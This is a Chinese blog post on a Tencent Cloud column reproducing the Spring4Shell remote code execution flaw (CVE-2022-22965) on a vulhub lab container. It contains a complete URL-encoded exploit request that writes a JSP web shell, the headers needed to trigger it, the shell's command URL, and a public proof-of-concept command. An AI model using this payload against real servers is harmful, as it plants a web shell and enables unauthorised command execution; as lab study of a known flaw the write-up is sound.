前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Spring Framework远程代码执行漏洞复现(CVE-2022-22965)

Spring Framework远程代码执行漏洞复现(CVE-2022-22965)

作者头像
R0A1NG
发布2022-05-03 11:24:20
2.2K0
发布2022-05-03 11:24:20
举报
文章被收录于专栏:R0A1NG 技术分享R0A1NG 技术分享

简述

Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 Spring Framework存在远程代码执行漏洞,在 JDK 9 及以上版本环境下,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行漏洞。

影响版本

  • Spring Framework 5.3.x < 5.3.18
  • Spring Framework 5.2.x < 5.2.20

漏洞条件

  • JDK9或以上版本系列
  • Spring框架或衍生的SpringBoot等框架,版本小于v5.3.18或v5.2.20
  • Spring JavaBean表单参数绑定需要满足一定条件
  • 部署在Tomcat容器中,且日志记录功能开启(默认状态)

漏洞复现

靶机:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965

docker run -p 8080:8080 -d vulhub/spring-webmvc:5.3.17

请输入图片描述
请输入图片描述

构造参数

请输入图片描述
请输入图片描述

构造请求写入shell

代码语言:javascript
复制
http://192.168.44.131:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

然后burp抓包,把以下字段删掉

代码语言:javascript
复制
cookie: JSESSIONID=xxxxxx
Upgrade-Insecure-Requests: 1
sec-Fetch-Dest: document
sec-Fetch-Mode: navigatesec-Fetch-site: none
sec-Fetch-User: ?1
Cache-Control: max-age=0

然后添加字段

代码语言:javascript
复制
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 2
请输入图片描述
请输入图片描述

然后访问 http://192.168.44.131/tomcatwar.jsp?pwd=j&cmd=whoami

返回root

请输入图片描述
请输入图片描述

请输入图片描述

poc:https://github.com/BobTheShoplifter/Spring4Shell-PoC

python poc.py --url=http://192.168.44.131/

然后访问http://192.168.44.131/tomcatwar.jsp?pwd=j&cmd=whoami

不要多次执行。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-05-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 简述
  • 影响版本
  • 漏洞条件
  • 漏洞复现
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档